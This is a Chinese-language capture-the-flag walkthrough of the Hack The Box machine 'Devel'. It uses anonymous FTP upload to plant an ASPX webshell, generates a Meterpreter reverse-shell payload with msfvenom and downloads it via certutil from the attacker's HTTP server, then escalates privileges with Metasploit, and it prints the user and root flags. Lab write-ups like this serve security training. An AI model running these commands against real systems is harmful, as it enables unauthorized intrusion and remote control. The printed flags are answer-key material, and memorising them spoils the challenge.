目录
连接至HTB服务器并启动靶机
1.What is the name of the service is running on TCP port 21 on the target machine?
使用nmap对靶机TCP端口进行开放扫描
2.Which basic FTP command can be used to upload a single file onto the server?
尝试匿名连接至靶机FTP服务
查看FTP服务中的文件结构
3.Are files put into the FTP root available via the webserver?
使用浏览器访问靶机80端口
使用ffuf对靶机80端口页面进行路径FUZZ
尝试直接在FTP服务中往aspnet_client目录上传文件
4.What file extension is executed as a script on this webserver? Don't include the ..
将KALI自带的ASPX_WEBSHELL拷贝到当前目录下
编辑
通过浏览器访问Webshell
还是老老实实走FTP服务,把马子传上去吧T_T
5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
切换到提权扫描模块
6.Submit the flag located on the babis user's desktop.
7.Submit the flag located on the administrator's desktop.
USER_FLAG:933242a201e4f0b3d9aa931f32376d8c
ROOT_FLAG:d762d0f53467df1fa2e5910f0e2e44ed
连接至HTB服务器并启动靶机
靶机IP:10.10.10.5
分配IP:10.10.14.12
1.What is the name of the service is running on TCP port 21 on the target machine?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 19:39 EST
Nmap scan report for 10.10.10.5 (10.10.10.5)
Host is up (0.067s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 80.82 seconds
对靶机开放的TCP端口进行脚本、服务扫描
nmap -p 21,80 -sCV 10.10.10.5
由扫描信息可知,在VERSION栏目下21端口:Microsoft ftpd
2.Which basic FTP command can be used to upload a single file onto the server?
由nmap扫描可见,靶机FTP服务允许匿名登录
尝试匿名连接至靶机FTP服务
ftp 10.10.10.5┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
在FTP服务中,使用put命令上传文件
查看FTP服务中的文件结构
ftp> dir
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
3.Are files put into the FTP root available via the webserver?
使用浏览器访问靶机80端口
通过Wappalyzer插件可知,该页面使用ASP.NET作为框架
使用ffuf对靶机80端口页面进行路径FUZZ
ffuf -u http://10.10.10.5/FUZZ -w ../dictionary/common.txt
这里扫出来的aspnet_client目录很像上文FTP中dir出来的目录
尝试直接在FTP服务中往aspnet_client目录上传文件
提示被阻拦了,大概率是因为没有权限,这里回到主目录下再次尝试put上传
ftp> cd ../
250 CWD command successful.
ftp> put This_Is_A_Test
local: This_Is_A_Test remote: This_Is_A_Test
229 Entering Extended Passive Mode (|||49170|)
125 Data connection already open; Transfer starting.
0 0.00 KiB/s
226 Transfer complete.
提示成功上传,使用curl访问该文件(这里换了个写有内容的test.txt文件)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo 'This is a test' > test.txt (上传了这个文件)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.10.5/test.txt
This is a test
经过测试,可以通过靶机FTP服务将文件上传至Web目录下(YES)
4.What file extension is executed as a script on this webserver? Don't include the ..
因为上文通过Wappalyzer插件可知,靶机Web页使用ASP.NET框架
所以大概率使用的脚本语言是:ASP、ASPX
将KALI自带的ASPX_WEBSHELL拷贝到当前目录下
cp /usr/share/webshells/aspx/cmdasp.aspx $(pwd) 改个名,然后通过FTP服务直接上传到靶机Web目录下
mv cmdasp.aspx shell.aspx
通过浏览器访问Webshell
执行systeminfo命令或者echo %PROCESSOR_ARCHITECTURE%命令查看靶机系统位数
攻击机本地生成一个x32的Meterpreter马子
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=1425 -f exe > reverse.exe攻击机本地通过python开启http服务
python -m http.server 7777靶机通过Webshell将马子下载
certutil.exe -urlcache -split -f http://10.10.14.12:7777/reverse.exe reverse.exe这个命令下载慢的一批就算了而且还容易断联,powershell的下载命令还没法用
还是老老实实走FTP服务,把马子传上去吧T_T
意外的失败了,可能是因为文件太大了?(传了两次回头再看发现已经有一个成功上传)
首先查找一下马子的位置
cd /d c:\ && dir /s reverse.exe
然后在MSF里配置好监听模块的参数
在Webshell中直接运行马子,直接输入文件完整路径即可
c:\inetpub\wwwroot\reverse.exe
Emmmmm,好像是因为文件不兼容?
最后看了官方WP,捏马的居然是直接用msfvenom生成aspx格式的马子
重新配置MSF中的监听参数并不断生成不同的MSF马子依然无法弹回Meterpreter
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:1425
[*] Sending stage (176198 bytes) to 10.10.10.5
一直卡在这.......(这里严重怀疑是靶机网络有问题,或者我的网络有问题)
最后更新了Metasploit解决问题
5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
在Metasploit中,常用的本地提权扫描模块:local_exploit_suggester
切换到提权扫描模块
use post/multi/recon/local_exploit_suggester将SESSION设置为Meterpreter收回后的会话
set SESSION 1
从冒绿光的模块里随便选几个出来,配置好参数直接提权即可
6.Submit the flag located on the babis user's desktop.
7.Submit the flag located on the administrator's desktop.
查找user_flag、root_flag位置,并查看其内容
meterpreter > search -f user.txt
Found 1 result...
=================Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\babis\Desktop\user.txt 34 2024-11-06 22:29:47 -0500meterpreter > search -f root.txt
Found 1 result...
=================Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\Desktop\root.txt 34 2024-11-06 22:29:47 -0500meterpreter > shell
Process 2748 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
d762d0f53467df1fa2e5910f0e2e44edc:\windows\system32\inetsrv>type c:\Users\babis\Desktop\user.txt
type c:\Users\babis\Desktop\user.txt
933242a201e4f0b3d9aa931f32376d8c
